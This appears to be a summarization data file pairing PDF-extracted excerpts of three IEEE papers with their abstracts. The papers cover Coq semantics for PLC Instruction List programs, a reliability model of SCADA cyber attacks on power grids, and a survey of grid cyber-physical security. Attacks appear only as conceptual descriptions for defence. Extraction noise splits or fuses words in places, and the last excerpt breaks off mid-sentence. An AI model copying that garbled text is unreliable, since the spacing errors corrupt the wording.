weformalizedandprovedsomesafety properties about the IL program presented above. For example, Figure 10 shows two lemmas that prove some properties about the output Q0and the timer output T0.T h el e m m a barrier_open 133 134 125 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Lemma barrier_open : forall cs 0s , exec (c,s0,0,E) (c,s,0,O) BofN (s Q0) = (BofN (s0 I0) || BofN (s0 Q0)) && ~~ BofN (s0 T0) && ~~ BofN (s0 Q1). Lemma timer_on : forall cs 0s , exec (c, s0, 0, E) (c, s, 0, O) BofN (s T0) = BofN (s0 I1) && (PT <= (s0 ET0)). Figure 10. IL Con gurations transition states that after one cycle execution, the output Q0will be on if the input I0was on at the input phase or Q0w a so ni nt h ep r e v i o u sc y c l e ,a n dt h e timer output and the output Q1were o during the previous cycle. The lemma timer_on states that the timer output will be on if and only if the input I1is on and the elapsed time is greater or equal to the prede ned time delay. The proofs of this two lemmas are straight forward and proceed by case analysis over the inductive predicate exec. V. Related works T h e r ei sn u m e r o u sp u b l i c a t i o n so nt h eu s eo f formal methods for the veri cation of PLC pro- grams.Modelcheckingisthemostusedapproachin these veri cation works. In [2] a semantics of IL is de ned using timed automaton. The language sub- set contains TON timers but data types are limited to booleans. The formal analysis is performed by the model checker UPPAAL. In [3] an operational semantics of IL is de ned. A signi cant sub-set of IL is supported by this semantics, but it does not include timer instructions. The semantics is encoded in the input language of the model checker Cadence SMV and linear temporal logic (LTL) is used to specify properties of PLC programs. Abstraction interpretation techniques are also used for the veri cation of PLC programs. In [5] an op- erational semantics of IL is de ned. This semantics is used to perform abstract interpretation of IL programs by a prototype tool called HOMER. In the theorem proving community, there has been some work on the formal analysis of PLC pro- grams. In [4] the theorem prover HOL is used to verify PLC programs written in FBD, SFC and ST languages. In this work, modular veri cation is used for compositional correctness and safety proofs of programs. In the Coq system, an exam-ple of veri cation of PLC program with timers is presented in [11]. A quiz machine program is used as an example in this work, but no generic model of PLC programs is formalized. There is also a formalization of a semantics3of the LD languages inCoq. This semantics support a sub-set of LD that contains branching instructions. This work is a component of a CDK environment for PLC. VI. Conclusions and future work Ourgoalistodevelopaformallyveri edcompiler and a veri cation tool for PLC programs. This require a formal semantics of PLC programing languages. In this paper we presented a formal semantics of PLC programs written in the IL lan- guage. This semantics covers a large sub-set of IL instructions that includes timers. We formalized this semantics in the type theory based theorem prover Coq and used it to prove some safety prop- erties of a simple example of PLC program. The proof of these properties are straightforward and require only some basic knowledge about the Coq system. Although our main goal is the development of a PLC certi ed compiler, this work can also be usedforformallyprovingpropertiesofILprograms. In the short term, the perspectives of our work are the following: Developing a certi ed compiler front-end for PLC. We plan to formalize and certify a trans- formation of PLC programs written in LD language to IL. Integrating our formal semantics of IL with the formal semantics of the meta language SFC [12]. This work will allow us to prove safety properties of industrial examples of PLC programs written in SFC. In the long term, the work on the certi ed compiler front-end open the way to the development of a certi ed compilation chain for PLC. This chain can be build on top of the CompCert compiler and uses the BIP [13] framework as an intermediate language. We also plan to develop a static analysis tool for PLC programs. 3Research report in Korean available at: http://pllab.kut. ac.kr/tr/2009/ldsemantics.pdf 134 135 126 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply.
Summary:
Programmable logic Controllers (PLC) are embedded systems that are widely used in industry. We propose a formal semantics of the Instruction List (IL) language, one of the ve programing languages de ned in the IEC 61131-3 standard for PLC programing. This semantics support a signi cant subset of the IL language that includes on-delay timers .W e formalized this semantics in the proof assistant Coq and used it to prove some safety properties on an example of PLC program.
|
Summarize:
Keywords power system reliability; SCADA system; cyber security; forced outage rate; loss of load probability. I. I NTRODUCTION The drastic technological innovation has enabled the power system to be more flexible and to accommodate a more open architecture to fulfill the re quirements of modern power industry [1]. Also, as the communication technology plays a crucial role by improving the information management efficiency in the power system, more communication protocols and network structures are being investigated, which provides the power system a more open development environment. In these days, the supervisory control and data acquisition (SCADA) system is an import part of the power grid system by collecting data from the remote facilities and sending back the control commands. As the power grid becomes more complex and tightly coupled with the SCADA system, the resilience of the power system becomes susceptible as the power grid tu rns out to be more vulnerable to the external cyber attacks than the internal errors of operations [2]. Thus, it is crucia l to carry out the analysis of vulnerability incurred by the cyber attacks between the SCADA and power system and quantify the impacts due to the attacks. However, although the security problem of the SCADA and power system has been present for several years,due to the lack of quantification efforts [3] and limited work ofintegrated analysis of both the SCADA system and power system, the evaluation of the actual impact of cyber attacks on the power supply adequacy is lacked thus far. In order to conduct the evaluation, it is necessary to do a quantitative study of the severity of the cyber attacks foridentifying the cascading failures in the cyber domain [3]. Since the power system is directly controlled by the SCADAsystem, it is useful to analyze the effects of the cyber attacks on the SCADA system so that the impacts of cyber attacks on the power system can be derived. Thus, typical attacks launched to the SCADA system should be found out and their types need to be classified. Also, attacks targeting the control and communication functions of the SCADA system will yielddifferent levels of risks to the power system. For instance, the infection of worms in the control subsystem of the SCADA system may shut down the whole SCADA, while some attacks may slightly increase the vulnerabilities of the SCADA system. The influences of these attacks on the SCADA will incur different impacts on the power system. What's more, it is crucial to assess the realistic effects of various attacks on the components in the power grid system based on their corresponding attack models. The generators, transmission lines, and loads in the power grid have different probabilities of failure, and these probabilities may be significantly different due to the reliability ch aracteristics of their elements. Therefore, by studying the reliability characteristics of various components and the probabilistic models of different attacks to the SCADA system, the impacts on the reliability of the components in the power grid system can be evaluated, and the corresponding protection schemes can also be decided. In this paper, by considering typical cyber attacks and their effects on the SCADA system, as well as the impacts of these attacks occur in different components of the power system, a forced outage rate (FOR) model is proposed, and the reliability analysis is performed to derive the loss of load probability (LOLP) curves using the FOR model in the Monte Carlo simulation (MCS). The organization of this paper is listed as follows: In Section II, the related work of cyber attacks on the SCADA system and the reliability analysis are discussed. Typical attacks in the SCADA system and the proposed FOR model are described and analyzed in Section III. And in Section IV, the LOLP curves in two reliability test systems are simulated ,((( 462Proceedings of the 2013 IEEE International Conference on Cyber Technology in Automation, Control and Intelligent Systems May 26-29, 2013, Nanjing, China Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. and analyzed based on the MCS with the FOR values. And the paper is concluded in Section V. II. L ITERATURE REVIEW Since the power system is not only a network composed of generators and loads through th e transmission lines, but is overlaid with the communication and control system such as SCADA, which manages the economic and secure operation [4], the estimation of the reli ability of the power system and SCADA is significantly complicated and necessary. A number of studies on the power system and SCADA have shown their efforts on searching for the impacts of power system. Vulnerability assessment of th e cyber security of the SCADA system controlling the power grid is illustrated in [5]. Two models of the SCADA systems, firewall model and password model, are generated for the simulation of attacks.The firewall model is used to regulate the packets between networks, while the password model is applied to monitor the penetration attempts. With thes e two models, vulnerabilities of the SCADA system are evaluated in two scenarios with attacks from inside and outside the network, and the vulnerability indices for each model is calculated. Similar investigation of the vulnerability evaluation was conducted in [6] by using attack tree approach. A reachability framework is developed in [2] to perform safety analysis for a two-area power system. The attack targeting the power system by gaining the access to the Au tomatic Generation Control (AGC) can be identified using the reachability framework. However, this approach focuses on the two-area in the power system, rather than the SCADA system. The vulnerabilities of the industrial control networks are reviewed and discussed in [7]. The threats to devices in the power system such as Programmable Logic Controllers (PLC), Distributed Control Systems (DCS), and Human Machine Interfaces (HMI) in SCADA system are analyzed, and a series of protection policy is developed and applied to increase both internal and external security of the network. And in [8] it gives a detailed review of the vulnerabilities and risks of various components of the electric power system. Since security flaws of SCADA are considered as the main vulnerable point from the remote access through Internet, new communication standard is needed for the encryption devices between the SCADA RTU and the modem linked to the Internet. More literature focuses on the impacts of attacks or vulnerabilities on the SCADA system, which is highly related to the security of the entire power system. In [9] it proposed model of the control system in SCADA to identify the most critical sensors and attacks of anomaly detection. Three mathematical models of stealthy attack are simulated as the intrusion to the control system, and it was found that protecting against the integrity attacks is more important than DoS attacks. It means the integrity attacks will lead to more severe impact on the SCADA system. Similarly, [10] presented a risk assessment method by using a Operationally Critical Threat, Asset, an d Vulnerability Evaluation (OCTAVE) tool to evaluate the risk model, which identifies the severity levels of the th reats and vulnerabilities in the control system. In [11], The Modbus DoS attack which is composed of email-based attack, phishing attack, and Modbus worm attack in SCADA are analyzed for the SCADA systems in the process network. The Modbus worm attack is tested in the power plant testbed, which concluded that the effective attacks should be launched by knowing the high-level architecture of the system. Also, it is found in [12] that about 78% incidents of external attacks between 2002 and 2006 are worms, viruses, and Trojan horses, and over 50% are worms. For instance, the Slammer worm has an extremely high infection rate by doubling themselves each 8.5 seconds [13]. What's more, popular approaches that prevent risks and vulnerabilities such as firewall and intrusion detection systems are evaluated in the SCADA network environment [14], [15]. III. A TTACKS IN SCADA S YSTEM There are multiple approaches to classifying the attacks in SCADA systems. In [13], three categories are classified based on the intention of launching the attacks, including intentional targeted attacks, unintentional consequences caused by worms and viruses, and unintentional consequences raised by internal causes. In our study the attacks are classified by the effects brought to the SCADA system. The effects on the SCADA system include confidentiality, integrity, and availability. Additionally, worms and viruses account for a great amount of incidents of the SCADA attacks and usually lead to the consequence of shutting down the whole system. Here worms and viruses are separated from other attacks and their occurrences and effects will be described in this section. When the attacks occur in the SCADA system, the control or the communications of the SCADA will be influenced by the effects of one or several of these attacks. With the failed controls from the SCADA, the management or the transmission of the power may be affected in the power system. For example, the transmission line may be improperly tripped due to the modified relay setting by the malicious intruders. This can be indicated as the increase of the forced outage rate (FOR) values of the components in the power system. FOR is a basic generating unit parameter for the static capacity evaluation [16] and is used for forecasting the probability of the component in the forced outage mode, which indicates the unavailability status. The FOR of components in the power system is shown as (1): i old new P FOR FOR i+D (1) In (1) old FOR is the original FOR values of two components: generators and the transmission lines in various power systems. Pis the probability of one type of attacks occurring in the SCADA system, and iis the type of each attack. Dindicates different impacts of the attacks with different probabilities of occurrences. From the record of external attack incidents between 2002 and 2006, DoS attacks take the least part of 4% in the total record, and the attacks capable of ruining the confiden tiality and integrity take about 9% of the total attacks. The largest amount of attacks is generated by the worms, viruses, and Trojan horses, which takes 78% of the total incidents, and three types of worms account for over 50% of the total records [12]. The worms and viruses occupy a great portion of the recorded attacks, and the aspects impacted by worms and viruses might be the 463 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:42:51 UTC from IEEE Xplore. Restrictions apply. combination of the confidentiality, integrity, and availability. Therefore, they are separated from the DoS attacks as well as the confidentiality and integrit y attacks. The rates of attack distributions are generally denoted as iPin this paper, but the values of iPare variable since the targets of attacks may be changed and the distributions of the new attacks may differ from the ones of several years ago. These rates of attacks are considered as values ofiP, while some modifications of the rates for different attacks are made by considering the changes of vulnerabilities and targets in the SCADA system. Dis represented by (2), which is influenced by three factors: lk HD (2) In (2),H indicates the risk level at which different components might be affected by the upcoming attacks. Two components, generator and transmission line of the power systems, are considered at different risk levels. Since the generator is more centralized and easier to control and manage, the probability of increasing vulnerabilities and risks from the attacks is low. On the other hand, the transmission lines are constructed in the distributed mode, which are more vulnerable to attacks. Thus tw o risk levels which show low and high levels are given to th e generator and the transmission lines, and the values are normalized as 0.2 and 0.7. kis a coefficient indicating whether the attack is easy to be generated and launched. Some attacks such as worms are easy to generate and spread within a very short time, thus their values of the corresponding kare labeled as high. Rather, some attacks such as spoofing are generated by approaches with complex steps and expensive equipment and their values of kare set lower. And limplies the severity level of impact that the attack may bring to SCADA system. The attacks leading to immediate paralysis of the system will be assigned higher lvalues, while the attacks that bring slight vulnerability to the SCADA have lower l values. In order to analyze the impact of cyber vulnerability on the power system through the attacks on the SCADA, 10 typical attacks, which can leave vulnerabilities and risks in DoS (availability), confidentiality, and integrity of the SCADA system, are analyzed based on the classification and the influencing elements discussed above. Also, since worms and viruses take a largest part in all attacks, they are separated from other attacks and considered as two other types of attacks. The typical DoS attacks in SCADA system could be found as e-mail based attack, phishing attack, and spoofing. As it is named, the e-mail based attack is launched through appropriate access by forging an e-mail with correct headers and contextual information. With an attachment of DoS malware, the malicious information will be delivered to the target slaves once the malware is installed into the network, which will lead to the loss of synchronization between master and slave machines. Thus it can be found that the e-mail based attack owns high values of both kandl. However, as the pure DoS attacks are rarely implemented in the environment of SCADA system, and the e-mail based attack could be prevented before it is delivered through the SCADA system, the occurrence of this attack is considered as very rare, which means the value of its Pis very low. The phishing attack transmits the website that can lead to DoS malware downloading in the malicious scripts. Several steps are needed in order to launch this attack. First, some tricks such as a DNS poisoning attack that makes the operator visit the website with the malicious scripts are applied, then the DoS malware will be downl oaded and execu ted when the scripts are reviewed, and finally the communications or control in the SCADA system will be blocked by the DoS attack. The process of launching the phishing attack is not as simple as the e-mail attack due to the combination of other attacks, thus the value of its kis labeled as the middle level. However, based on the effect of this attack on the system, which shows the communications between the components can be cut off, the severity level of this attack is still high. Fortunately, the occurrence of this type of attack is also rare, thus the Pvalue of phishing attack is very low. The last popular DoS attack to the SCADA system is spoofing, which is also known as replay attack [13]. By transmitting commands to the controller continuously and cutting off communications between devices, it may lead to an undesirable result in both SCADA system and control devices in the power system. At the same time, some crucial data from the controller or HMI may be modified. These will lead to a high value of lof spoofing attack. However, this attack has the most difficult payload to operate, which makes spoofing one of the complex attacks to execute. Thus the value of kof spoofing should be deemed as a low level. Similar to other DoS attacks, this attack is also rare in the total occurrence of attacks, which means the value of Pis set the same as phishing attack. The worm attack is a very effective and efficient technique to spread malicious attacks in the SCADA system [11]. Based on the record of attacks of SCADA during 2002 to 2006, over half of attacks launched to the SCADA are worms, which are Slammer, Blaster, and Sasser worms. Worms are spread to the devices leading to the severe results such as backdoor of the control components or other vulnerability issues. Once a machine is infected by the worm, it will attempt to spread the worms to new hosts and efficiently execute the malicious code. And from the result of infections on the system, it can be found all the slave machines are controlled by the worms [11]. Also, the attacks of the Slammer worms disabled the safety monitoring system for about five hours, and it affected the Windows server and communications networks by blocking the control system traffic in 2003 [13]. With these
Summary:
As power grids rely more on the open communication technologies and supervisory control and data acquisition (SCADA) system, they are becoming more vulnerable to malicious cyber attacks. The reliability of the power system can be impacted by the SCADA system due to a diverse set of probable cyber attacks on it. This paper deals with the impact of cyber attacks on power system reliability. A forced outage rate (FOR) model is proposed considering the impacts of cyber attacks on the reliability characteristic of generators and transmission lines. Different occurrences of the cyber attacks targeting the SCADA system lead to different effects on the FOR values. The loss of load probabilities (LOLP) curves in two reliability test systems are simulated based on 10 different types of attacks in the SCADA system. The simulation results illustratethat the reliability of the power system decreases as the effects of cyber attacks on SCADA become severe.
|
Summarize:
KEYWORDS |Cyber physical systems (CPS); cyber security; electric grid; smart grid; supervisory control and data acquisi-tion (SCADA) I.INTRODUCTION An increasing demand for rel iable energy and numerous technological advancements have motivated the develop-ment of a smart electric grid. The smart grid will expand the current capabilities of the grid s generation, transmis- sion, and distribution systems to provide an infrastructurecapable of handling future requirements for distributedgeneration, renewable energy sources, electric vehicles,and the demand-side management of electricity. The U.S.Department of Energy (DOE) has identified seven pro-perties required for the smart grid to meet future demands[1]. These requirements include attack resistance, self- healing, consumer motivation, power quality, generation and storage accommodation, enabling markets, and assetoptimization. While technologies such as phasor measurement units (PMU), wide area measurement systems, substationautomation, and advanced metering infrastructures(AMI) will be deployed to help achieve these objectives,they also present an increased dependency on cyber resources which may be vulnerable to attack [2]. Recent U.S. Government Accountabili ty Office (GAO) investiga- tions into the grid s cyber infrastructure have questionedthe adequacy of the current security posture [3]. TheNorth American Electric Reliability Corporation (NERC)has recognized these concerns and introduced compli-ance requirements to enforc eb a s e l i n ec y b e r s e c u r i t y efforts throughout the bulk power system [4]. Addition- ally, current events have shown attackers using increas- ing sophisticated attacks a gainst industrial control systems while numerous countries have acknowledgedthat cyber attacks have targeted their critical infrastruc-tures [5], [6]. A comprehensive approach to understanding security concerns within the grid must utilize cyber physical sys-tem (CPS) interactions to appropriately quantify attack impacts [7] and evaluate effectiveness of countermeasures. This paper highlights CPS security for the power grid asthe functional composition of the following: 1) the physical Manuscript received June 29, 2011; revised August 11, 2011; accepted August 12, 2011. Date of publication October 3, 2011; date of current version December 21, 2011. This work was supported by the National Science Foundation under Grant CNS 0915945. The authors are with the Department of Electrical and Computer Engineering, Iowa State University, Ames, IA 50011 USA (e-mail: sridhar@iastate.edu). Digital Object Identifier: 10.1109/JPROC.2011.2165269 210 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 0018-9219/$26.00 /C2112011 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. components and control applications; 2) the cyber infra- structures required to support necessary planning, oper- ational, and market functions; 3) the correlation between cyber attacks and the resulting physical system impacts;and 4) the countermeasures to mitigate risks from cyberthreats. Fig. 1 shows a CPS view of the power grid. Thecyber systems, consisting of electronic field devices, com-munication networks, substation automation systems, andcontrol centers, are embedded throughout the physicalgrid for efficient and reliable generation, transmission, and distribution of power. The control center is responsible for real-time monitoring, control, and operational decisionmaking. Independent system operators (ISOs) performcoordination between power utilities, and dispatch com-mands to their control centers. Utilities that participate inpower markets also interact with the ISOs to support mar-ket functions based on real-time power generation, trans-mission, and demand. This paper addresses smart grid cybersecurity concerns by analyzing the coupling between the power controlapplications and cyber systems. The following terms areintroduced to provide a common language to address theseconcepts throughout the paper: power application : the collection of operational control functions necessary to maintain stabilitywithin the physical power system; supporting infrastructure : the cyber infrastructure including software, hardware, and communicationnetworks. This division of the grid s command and control functionswill be utilized to show how cybersecurity concerns can beevaluated and mitigated throu gh future research. Attempts to enhance the current cybersecurity posture should ex-plore the development of secure power applications with more robust control algorithms that can operate reliably in the presence of malicious inputs while deploying a secure supporting infrastructure that limits an adversary s ability to manipulate critical cyber resources.The paper is organized as follows. Section II introduces a risk assessment methodology which incorporates both cyber and physical characteristics to identify physical im- pacts from cyber attacks. Section III presents a classifica-tion detailing the power applications necessary to facilitate grid control. Each power application contains a review ofthe information, communication, and algorithms requiredto support its operation. Additionally, specific cybersecur-ity concerns are addressed for each application and poten-tial physical impacts are explored. Section IV provides a review of current research efforts focusing on security enhancements for the supporting infrastructure . Finally, emerging research challenges are introduced in Section V to highlight areas requiring attention. II.RISK ASSESSMENT METHODOLOGY The complexity of the cyber physical relationship can present unintuitive system dependencies. Performing ac-curate risk assessments requires the development ofmodels that provide a basis for dependency analysis andquantifying resulting impact s. This association between the salient features within both the cyber and physical infrastructure will assist in the risk review and mitigation processes. This paper presents a coarse assessment meth-odology to illustrate the dependency between the powerapplications and supporting infrastructure. An overview ofthe methodology is presented in Fig. 2. Risk is traditionally defined as the impact times the likelihood of an event [8]. Likelihood should be ad-dressed through the infrastructure vulnerability analysis step which addresses the supporting infrastructure s ability to limit attacker s access to the critical controlfunctions. Once potential vul nerabilities are discovered, the application impact analysis should be performed todetermine effected grid control functions. This informa-tion should then be used to evaluate the physical systemimpact. Fig. 1. Power grid cyber physical infrastructure.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 211 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. A. Risk Analysis The initial step in the risk analysis process is the infra- structure vulnerability analysis .N u m e r o u sd i f f i c u l t i e sa r e encountered when determining cyber vulnerabilitieswithin control system environ ments due to the high avail- ability requirements and dependencies on legacy systems and protocols [9]. A comprehensive vulnerability analysis should begin with the identification of cyber assets includ-ing software, hardware, and communications protocols.Then, activities such as penetration testing and vulne-rability scanning can be utilized to determine potentialsecurity concerns within the environment. Additionally,continued analysis of security advisories from vendors,system logs, and deployed intrusion detection systems should be utilized to determine additional system vulner- abilities. Common control system cyber vulnerabilitieshave been evaluated by the Department of HomelandSecurity (DHS) based on numerous technical and non-technical assessments [10]. Table 1 identifies these vul-nerabilities and categorizes whether they were found inindustry software products, general misconfigurations, orwithin the network infrastructure. This list provides greater insight into likely attack vectors and also helps identify areas requiring additional mitigation research. After cyber vulnerabilities have been identified, the application impact analysis step should be performed todetermine possible impacts to the applications supportedby the infrastructure. This analysis should leverage theclassification introduced in Section III to identify the im-pacted set of communication and control mechanisms. Once attack impacts on the power applications have been determined, physical impact an alysis should be performed to quantify impact on the power system. This analysis canbe carried out using power system simulation methods toquantify steady state and tran sient performances including power flows and variations in grid stability parameters interms of voltage, frequency, and rotor angle. B. Risk Mitigation Mitigation activities should attempt to minimize unac- ceptable risk levels. This may be performed through thedeployment of a more robust supporting infrastructure or power applications as discussed in Sections III and IV. Understanding opportunities to focus on specific or com-bine approaches may present novel mitigation strategies. Numerous research efforts have addressed the cyber physical relationship within the risk assessment process.Interdependency research by Laprie et al. focuses on ana- lyzing escalating, cascading, and common-cause failureswithin the cyber physical relationship [11]. State ma- chines are developed to evaluate the transitions influenced by the interdomain dependencies. This research thenshows how attack-based transitions can lead to failurestates. A graph-based cyber physical model has been pro-posed by Kundur et al. [12]. Here graphs are analyzed to evaluate a control s influence on a physical entity. Thismodel is used to evaluate how power generation can beimpacted by the failures or attacks on cyber assets. Addi- tional research into computing likely load loss due a successful cyber attack has been performed by Ten et al. [13], [14]. This research uses probabilistic methods basedon Petri-nets and attack trees to identify weaknesses insubstations and control centers which can then be used toidentify load loss as a percentage of the total load withinthe power system. Table 1 Common Control System Vulnerabilities/Weaknesses Fig. 2. Risk assessment methodology.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 212 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. III. POWER SYSTEM CONTROL APPLICATIONS AND SECURITY A power system is functionally divided into generation, transmission, and distributi o n .I nt h i ss e c t i o n ,w ep r e s e n t a classification of control loops in the power system that identifies communication signals and protocols, machines/devices, computations, and control actions associated withselect control loops in each functional classification. Thesection also sheds light on the potential impact of cyberattacks directed at these control loops on system-widepower system stability. Control centers receive measurements from sensors that interact with field devices (transmission lines, trans- formers, etc.). The algorithm s running in the control cen- ter process these measurements to make operationaldecisions. The decisions are then transmitted to actuatorsto implement these changes on field devices. Fig. 3 shows ageneric control loop that represents this interaction be-tween the control center and the physical system. Themeasurements from sensors and control messages from the control center are represented by y i t and ui t ,r e s p e c - tively. In the power system, the measured physical param-eters y i t may refer to quantities such as voltage and power. These measurements from substations, transmis-sion lines, and other machines are sent to the controlcenter using dedicated communication protocols. Themeasurements are then processed by a set of computa-tional algorithms, collectively known as the energy man- agement system (EMS), running at the control center. The decision variables u i t are then transmitted to actuators associated with field devices. An adversary could exploit vulnerabilities along the communication links and create attack templates designedto either corrupt the content of (e.g., integrity attacks), orintroduce a time delay or denial in the communication of[e.g., denial of service (DoS), desynchronization, timing attacks] these control/measurement signals [15]. It is im- portant to study and analyze impacts of such attacks on thepower system as they could severely affect its security andreliability. These impacts can be measured in terms of lossof load or violations in system operating frequency andvoltage and their secondary impacts. Attack studies willalso help develop countermeasures that can prevent at-tacks or mitigate the impact from attacks. Countermea- sures include bad data detection techniques and attack resilient control algorithms. This section presents a classification of prominent control loops under generation, transmission, and distri-bution. Traditional supervisory control and data acquisi-tion (SCADA), local, and emerging smart grid controlshave been identified. For each control loop known vulne-rabilities, attack templates, and potential research direc- tions have also been highlighted. A. Generation Control and Security The control loops under generation primarily involve controlling the generator power output and terminal volt-age. Generation is controlled by both, local (automaticvoltage regulator and governor control) and wide-area(automatic generation control) control schemes as ex-plained in this section. Fig. 4 identifies the various param-eters associated with the control loops in the generationsystem. 1) Automatic Voltage Regulator (AVR): Generator exciter control is used to improve power system stability by con-trolling the amount of reactive power being absorbed orinjected into the system [16]. Digital control equipment forthe exciter enables testing of different algorithms forsystem stability improvement. Hence, this cost-effective Fig. 3. A typical power system control loop. Fig. 4. Generation control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 213 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. approach is widely preferred and used by generation utilities. The digital exciter control module is connected to the plant control center via Ethernet and communicates usingprotocols such as Modbus [17]. This Ethernet link is usedto program the controller with voltage setpoint values. TheAVR control loop receives generator voltage feedback fromthe terminal and compares it with the voltage setpointstored in memory. Based on the difference between the observed measurement and the setpoint, the current through the exciter is modified to maintain voltage atthe desired level. 2) Governor Control: Governor control is the primary frequency control mechanism. This mechanism employs asensor that detects changes in speed that accompanydisturbances and accordingly alters settings on the steam valve to change the power output from the generator. The controllers used in modern digital governor control mod-ules make use of Modbus protocol to communicate withcomputers in the control center via Ethernet [18]. As in thec a s eo fA V R ,t h i sc o m m u n i c a t i o nl i n ki su s e dt od e f i n eoperating setpoint for control over the governor. a) Cyber vulnerabilities and solutions: The AVR and the governor control are local control loops. They do not de- pend on the SCADA telemetry infrastructure for their ope- rations as both the terminal voltage and rotor speed aresensed locally. Hence, the attack surface for these controlloops is limited. Having said that, these applications are stillvulnerable to malware that could enter the substation LANthrough other entry points such as USB keys. Also, thedigital control modules in both control schemes do possesscommunication links to the plant control center. To target these control loops, an adversary could compromise plant cybersecurity mechanisms and gain an entry point into thelocal area network. Once this intrusion is achieved, an ad-versary can disrupt normal operation by corrupting thelogic or settings in the digital control boards. Hence, secu-rity measures that validate control commands that originateeven within the control center have to be implemented. 3) Automatic Generation Control: The automatic gener- ation control (AGC) loop is a secondary frequency controlloop that is concerned with fine tuning the system fre-quency to its nominal value. The function of the AGC loop is to make corrections to interarea tie-line flow and fre- quency deviation. The AGC ensures that each balancingauthority area compensates for its own load change and thep o w e re x c h a n g eb e t w e e nt w oc o n t r o la r e a si sl i m i t e dt othe scheduled value. The algorithm correlates frequencydeviation and the net tie-line flow measurements to deter- mine the area control error ; the correction that is sent to each generating station to adjust operating points once every five seconds. Through this signal, the AGC ensures that each balancing authority area meets its own loadchanges and the actual power exchanged remains as closeas possible to the scheduled exchange. a) Cyber vulnerabilities and solutions: The automatic generation control relies on tie-line and frequency meas-urements provided by the SCADA telemetry system. Anattack on AGC could have direct impacts on system fre- quency, stability, and economic operation. DoS type of attacks might not have a significant impact on AGC opera-tion unless supplemented with another attack that requiresAGC operation. The following research efforts haveidentified the impact of data corruption and intrusion onthe AGC loop. Esfahani et al. [19] propose a technique using reach- ability analysis to gauge the impact of an intrusion attack on the AGC loop. In [20], Sridhar and Manimaran develop an attack template that ap propriately modifies the frequency and tie-line flow measurements to drive thesystem frequency to abnormal operating values. Areas of future research include: 1) evaluating impacts of DoS attacks on the AGC loop in combination with otherattacks that trigger AGC opera tion; and 2) development of domain-specific bad data detection techniques for AGC to identify data integrity attacks. B. Transmission Control and Security The transmission system normally operates at voltages in excess of 13 KV and the comp onents controlled include switching and reactive power support devices. It is the responsibility of the operator to ensure that the power flowing through the lines is within safe operating marginsand the correct voltage is mai ntained. The following con- trol loops assist the operator in this functionality. Fig. 5summarizes the communication protocols and other Fig. 5. Transmission control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 214 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. parameters associated with the control loops in the transmission system. 1) State Estimation: Power system state estimation is a technique by which estimates of system variables such asvoltage magnitude and phase angle (state variables) aremade based on presumed faulty measurements from fielddevices. The process provides an estimate of state variablesnot just when field devices provide imperfect measure- ments, but also when the control center fails to receive measurements either due to device or communicationchannel malfunction. This gives the operator details onpower flows and voltage magnitudes along different sec-tions of the transmission network and hence assists inmaking operational decisions. The control center performscomputations using thousands of measurements it receivesthrough the wide-area network. A good amount of work has been done in developing tech niques to detect bad data in state estimation [21] [26]. These techniques provide goodestimates of state variables despite errors introduced bydevice and channel imperfecti ons. However, they were not designed to be fault tolerant when malicious data areinjected with intent. a) Cyber vulnerabilities and solutions: Bad data detec- tion in state estimation is well researched. However, these techniques were developed for errors in data that appear due to communication channel o r device malfunctioning. When an adversary launches an attack directed at disrupt-ing the smooth functioning of state estimation, these tech-niques might not be able to detect the presence ofmalicious data. Liu et al. created a class of attacks, called false data injection attacks, that escape detection by existing bad measurement identification algorithms, provided they had knowledge of the system configuration [27]. It was deter-mined that to inject false data into a single state variable inthe IEEE 300-bus system, it was sufficient to compromiseten meters. In [28], Kosut et al. verify that the impact from false data injection attack discussed in [27] is the same asremoving the attacked meters form the network. Theauthors also propose a graph-theoretic approach to deter- mine the smallest set of meters that have to be compro- mised to make the power network unobservable. Bobba et al. [29] developed a technique to detect false data injection attacks. The idea was to observe a subset ofmeasurements and perform calculations based on them todetect malicious data. Xie et al. show that a successful attack on state estimation could be used in the electricitymarkets to make financial gains [30]. As settlements be- tween utilities are calculated based on values from state estimation, the authors show that a profit of $8/MWh canbe made by tampering with meters that provide line flowinformation. 2) VAR Compensation: Volt-ampere reactive (VAR) compensation is the process of controlling reactive powerinjection or absorption in a power system to improve the performance of the transmission system. The primary aim of such devices is to provide voltage support, that is, tominimize voltage fluctuation at a given end of a trans-mission line. These devices can also increase the powertransferable through a given transmission line and alsohave the potential to help avoid blackout situations.Synchronous condensers and mechanically switchable capacitors and inductors were the conventional VAR com- pensation devices. However, with recent advancement in thyristor-based controlle r s ,d e v i c e ss u c ha st h eo n e s belonging to the flexible AC transmission systems(FACTS) family, are gaining popularity. FACTS devices interact with one another to exchange operational information [31]. Though these devices func-tion autonomously, they depend on communication withother FACTS devices for information to determine ope- rating point. a) Cyber vulnerabilities and solutions: In [32], the authors provide a list of attack vectors that could be usedagainst cooperating FACTS devices (CFDs). Though at-tacks such as denial of service and data injection are wellstudied and understood in the traditional IT environment,the authors provide an insight into what these attacksmean in a CFD environment. 1) Denial of cooperative operation: This is a DoS attack. In this type of attack, the communicationto some or all the FACTS devices could be 